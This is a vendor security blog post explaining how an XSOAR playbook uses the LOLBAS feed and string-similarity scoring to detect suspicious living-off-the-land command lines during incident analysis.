* [Blog](https://origin-researchcenter.paloaltonetworks.com/blog)
* [Security Operations](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/)
* [Playbook of the Week](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/category/playbook-of-the-week/)
* Playbook Of The Week - Fe...

# Playbook Of The Week - Fending Off Living Off the Land Attacks

[](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Forigin-researchcenter.paloaltonetworks.com%2Fblog%2Fsecurity-operations%2Fplaybook-of-the-week-fending-off-living-off-the-land-attacks%2F)  
[](https://twitter.com/share?text=Playbook+Of+The+Week+-+Fending+Off+Living+Off+the+Land+Attacks&url=https%3A%2F%2Forigin-researchcenter.paloaltonetworks.com%2Fblog%2Fsecurity-operations%2Fplaybook-of-the-week-fending-off-living-off-the-land-attacks%2F)  
[](https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Forigin-researchcenter.paloaltonetworks.com%2Fblog%2Fsecurity-operations%2Fplaybook-of-the-week-fending-off-living-off-the-land-attacks%2F&title=Playbook+Of+The+Week+-+Fending+Off+Living+Off+the+Land+Attacks&summary=&source=)  
[](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/playbook-of-the-week-fending-off-living-off-the-land-attacks/&ts=markdown)  
\[\](mailto:?subject=Playbook Of The Week - Fending Off Living Off the Land Attacks)  
Link copied  
By [Arik Day](https://www.paloaltonetworks.com/blog/author/arik-day/?ts=markdown "Posts by Arik Day")  
Aug 24, 2023  
5 minutes  
[Playbook of the Week](https://www.paloaltonetworks.com/blog/security-operations/category/playbook-of-the-week/?ts=markdown)  
[Automation](https://www.paloaltonetworks.com/blog/tag/automation/?ts=markdown)  
[command-line analysis](https://www.paloaltonetworks.com/blog/tag/command-line-analysis/?ts=markdown)  
[Cortex XSOAR](https://www.paloaltonetworks.com/blog/tag/cortex-xsoar/?ts=markdown)  
[LOLBAS](https://www.paloaltonetworks.com/blog/tag/lolbas/?ts=markdown)  
[security orchestration](https://www.paloaltonetworks.com/blog/tag/security-orchestration/?ts=markdown)

### **Introduction - Living Off the Land Attacks**

[Living Off the Land (LOTL)](https://www.paloaltonetworks.com/cyberpedia/what-are-fileless-malware-attacks) attacks are used by attackers to evade detection by the system's own native utilities, scripting languages, or trusted applications, rather than resorting to custom or malicious code that may raise suspicion. The use of native tools (Living Off the Land binaries, or LOLBins) also makes LOTL attacks far harder to detect via traditional detection methods.

Real world examples of how LOTL attacks are executed can be found in multiple threat research reports, like the [Threat Brief: Ongoing Russia and Ukraine Cyber Activity](https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/) published by Unit 42 that shows a usage of techniques that are documented in LOLBAS (Living Off the Land Binaries and Scripts) feed by WhisperGate Malware.

The report highlights the utilization of the LOLbin 'wscript.exe' to execute a VBS script, which in turn invokes PowerShell to establish a Windows Defender exclusion path. Wscript.exe is just one example of the many LOLbins documented in the LOLBAS feed.

### **The Importance of Early Detection: Preventing Damage from Living Off The Land Attacks**

Since identifying LOTL attacks can be a highly complex task, these attacks can enable bad actors to persistently access systems, siphon off sensitive data, or move laterally within a network without drawing attention to themselves. To prevent data breaches and protect crucial assets, including intellectual property, personal information, and other sensitive data, from unauthorized access or exposure, it is imperative to have efficient methods in place to detect LOTL attacks.

### **What is the Living Off the Land Binaries and Scripts (LOLBAS) Project?**

The LOLBAS project catalogs the binaries, scripts, and libraries of common operating systems that can be utilized for executing Living Off The Land techniques. Within the LOLBAS repository, all available LOLBins can be imported as tool type indicators into the Cortex XSOAR Threat Intelligence Management module (TIM) via the [LOLBAS Feed Integration](https://cortex.marketplace.pan.dev/marketplace/details/FeedLOLBAS/). Each LOLBin tool contains the following information:

* LOLBin name
* MITRE ATT\&CK reference to the relevant attack patterns
* LOLBin paths
* Detections - links to Sigma and YARA rules if they exist
* Commands - template of a malicious use of the tool

![Fig 1: LOLBin tool indicator layout](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/08/word-image-303060-1.png)
Fig 1: LOLBin tool indicator layout

### **Utilizing LOLBAS for Command-Line Analysis**

The goal is to verify whether the provided LOLBin command line argument exhibits similarity to the known malicious patterns outlined in the LOLBAS repository. By comparing the given argument to the documented patterns of potentially harmful activities, we aim to identify any potentially malicious behavior associated with the LOLBin command. This analysis helps ensure the security and integrity of system operations by proactively detecting potential threats.

For example,

Comparison between the following mshta.exe LOLBin command-line argument that is part of a security incident:

![](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/08/blog-one.png)

And the mshta.exe malicious argument pattern from LOLBAS:

![](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/08/blog-2.png)

### **Key Playbook Automations**

StringSimilarity

The StringSimilarity automation uses the SequenceMatcher class that is part of Python's difflib module to compare between strings and return similarity scores from 0 to 1(1 is identical). The automation outputs all of the strings that have a score equal or greater than a given threshold.
![Fig 2: StringSimilarity automation Inputs](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/08/word-image-303060-2.png)
Fig 2: StringSimilarity automation Inputs

![Fig 3: StringSimilarity output](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/08/word-image-303060-3.png)
Fig 3: StringSimilarity output

### **Playbook - Search For Suspicious LOLBin Executions**

The generic playbook "[Command-line Analysis](https://xsoar.pan.dev/docs/reference/playbooks/command-line-analysis)" is enhanced with the sub-playbook "Search For Suspicious LOLBin Executions". The sub-playbook will execute the following steps:

* Receive the relevant process names and process command-line arguments from its inputs
* Search if the Process image name exists in LOLBAS Feed
* Compare the provided command line arguments with the template of a malicious use in the tool from LOLBAS Feed
* If the similarity score is equal or greater than the given threshold, the provided command line argument will be set to the playbook outputs
* Finding suspicious LOLBin execution will affect the Command-Line Analysis playbook's final verdict

![Fig 4: Search for Suspicious LOLBin Executions playbook](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/08/word-image-303060-4.png)
Fig 4: Search for Suspicious LOLBin Executions playbook

### **Conclusion**

Harnessing the power of LOLBAS for command-line analysis in conjunction with XSOAR provides a robust approach to enhancing security and detecting potential threats. LOLBAS serves as a valuable resource for documenting legitimate binaries and scripts that can be repurposed for Living Off The Land techniques. Integrating the LOLBAS feed into XSOAR's Threat Intelligence Management module allows for seamless ingestion of LOLBins as tool indicators, enabling efficient analysis and identification of suspicious command-line activities. By leveraging this combination of LOLBAS and XSOAR, organizations can strengthen their security posture and stay one step ahead of potential adversaries in the ever-evolving landscape of cybersecurity.

| Glossary: Living Off the Land (LOTL): threat actors using legitimate system tools during an attack Living Off the Land binaries (LOLBins): The native tools used by threat actors in an attack. Living Off the Land Binaries and Scripts (LOLBAS): A catalog of the binaries, scripts, and libraries of common operating systems that can be utilized for executing Living Off The Land techniques. |
|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|

*** ** * ** ***

## Related Blogs

### [Playbook of the Week](https://www.paloaltonetworks.com/blog/security-operations/category/playbook-of-the-week/?ts=markdown)

[#### Playbook of the week: Uncover Your RDP Secrets](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/playbook-of-the-week-uncover-your-rdp-secrets/)

### [Playbook of the Week](https://www.paloaltonetworks.com/blog/security-operations/category/playbook-of-the-week/?ts=markdown), [Uncategorized](https://www.paloaltonetworks.com/blog/category/uncategorized/?ts=markdown)

[#### Playbook of the Week: Cloud Token Theft Response](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/playbook-of-the-week-cloud-token-theft-response/)

### [Playbook of the Week](https://www.paloaltonetworks.com/blog/security-operations/category/playbook-of-the-week/?ts=markdown)

[#### Playbook Of The Week - New Features for Better Response to Phishing Campaigns](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/playbook-of-the-week-new-features-for-better-response-to-phishing-campaigns/)

### [Playbook of the Week](https://www.paloaltonetworks.com/blog/security-operations/category/playbook-of-the-week/?ts=markdown)

[#### Playbook of the week: Streamlining SOC Communications](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/playbook-of-the-week-streamlining-soc-communications/)

### [Playbook of the Week](https://www.paloaltonetworks.com/blog/security-operations/category/playbook-of-the-week/?ts=markdown)

[#### Playbook of the Week: Automating SecOps Ticketing](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/playbook-of-the-week-automating-secops-ticketing/)

### [Playbook of the Week](https://www.paloaltonetworks.com/blog/security-operations/category/playbook-of-the-week/?ts=markdown)

[#### Playbook of the Week: Suspicious SSO? Check It Out with XSOAR](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/playbook-of-the-week-suspicious-sso-check-it-out-with-xsoar/)

### Subscribe to Security Operations Blogs!

Sign up to receive must-read articles, Playbooks of the Week, new feature announcements, and more.
![spinner](https://origin-researchcenter.paloaltonetworks.com/blog/wp-content/themes/panwblog2023/dist/images/ajax-loader.gif) Sign up  
Please enter a valid email.  
By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown) and acknowledge our [Privacy Statement](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown). Please look for a confirmation email from us. If you don't receive it in the next 10 minutes, please check your spam folder.  
This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply.  
{#footer} {#footer}

## Products and Services

* [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security?ts=markdown)

* [Secure AI by Design](https://www.paloaltonetworks.com/precision-ai-security/secure-ai-by-design?ts=markdown)

* [Prisma AIRS](https://www.paloaltonetworks.com/prisma/prisma-ai-runtime-security?ts=markdown)

* [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security?ts=markdown)

* [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions?ts=markdown)

* [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention?ts=markdown)

* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering?ts=markdown)

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire?ts=markdown)

* [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security?ts=markdown)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown)

* [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security?ts=markdown)

* [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown)

* [Industrial OT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown)

* [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall?ts=markdown)

* [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations?ts=markdown)

* [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls?ts=markdown)

* [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager?ts=markdown)

* [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription?ts=markdown)

* [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os?ts=markdown)

* [Panorama](https://www.paloaltonetworks.com/network-security/panorama?ts=markdown)

* [Secure Access Service Edge](https://www.paloaltonetworks.com/sase?ts=markdown)

* [Prisma SASE](https://www.paloaltonetworks.com/sase?ts=markdown)

* [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration?ts=markdown)

* [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem?ts=markdown)

* [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown)

* [Prisma Access](https://www.paloaltonetworks.com/sase/access?ts=markdown)

* [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser?ts=markdown)

* [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan?ts=markdown)

* [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation?ts=markdown)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown)

* [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex?ts=markdown)

* [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown)

* [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown)

* [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security?ts=markdown)

* [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security?ts=markdown)

* [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security?ts=markdown)

* [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud?ts=markdown)

* [AI-Driven SOC](https://www.paloaltonetworks.com/cortex?ts=markdown)

* [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam?ts=markdown)

* [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr?ts=markdown)

* [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar?ts=markdown)

* [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse?ts=markdown)

* [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/cortex/managed-detection-and-response?ts=markdown)

* [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam?ts=markdown)

* [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42?ts=markdown)

* [Proactive Assessments](https://www.paloaltonetworks.com/unit42/assess?ts=markdown)

* [Incident Response](https://www.paloaltonetworks.com/unit42/respond?ts=markdown)

* [Transform Your Security Strategy](https://www.paloaltonetworks.com/unit42/transform?ts=markdown)

* [Discover Threat Intelligence](https://www.paloaltonetworks.com/unit42/threat-intelligence-partners?ts=markdown)

## Company

* [About Us](https://www.paloaltonetworks.com/about-us?ts=markdown)
* [Careers](https://jobs.paloaltonetworks.com/en/)
* [Contact Us](https://www.paloaltonetworks.com/company/contact-sales?ts=markdown)
* [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility?ts=markdown)
* [Customers](https://www.paloaltonetworks.com/customers?ts=markdown)
* [Investor Relations](https://investors.paloaltonetworks.com/)
* [Location](https://www.paloaltonetworks.com/about-us/locations?ts=markdown)
* [Newsroom](https://www.paloaltonetworks.com/company/newsroom?ts=markdown)

## Popular Links

* [Blog](https://www.paloaltonetworks.com/blog/?ts=markdown)
* [Communities](https://www.paloaltonetworks.com/communities?ts=markdown)
* [Content Library](https://www.paloaltonetworks.com/resources?ts=markdown)
* [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia?ts=markdown)
* [Event Center](https://events.paloaltonetworks.com/)
* [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center)
* [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z?ts=markdown)
* [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance?ts=markdown)
* [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure?ts=markdown)
* [Sitemap](https://www.paloaltonetworks.com/sitemap?ts=markdown)
* [Tech Docs](https://docs.paloaltonetworks.com/)
* [Unit 42](https://unit42.paloaltonetworks.com/)
* [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![PAN logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg)
* [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown)
* [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center?ts=markdown)
* [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown)
* [Documents](https://www.paloaltonetworks.com/legal?ts=markdown)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector?ts=markdown)
* [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* EN  
  Select your language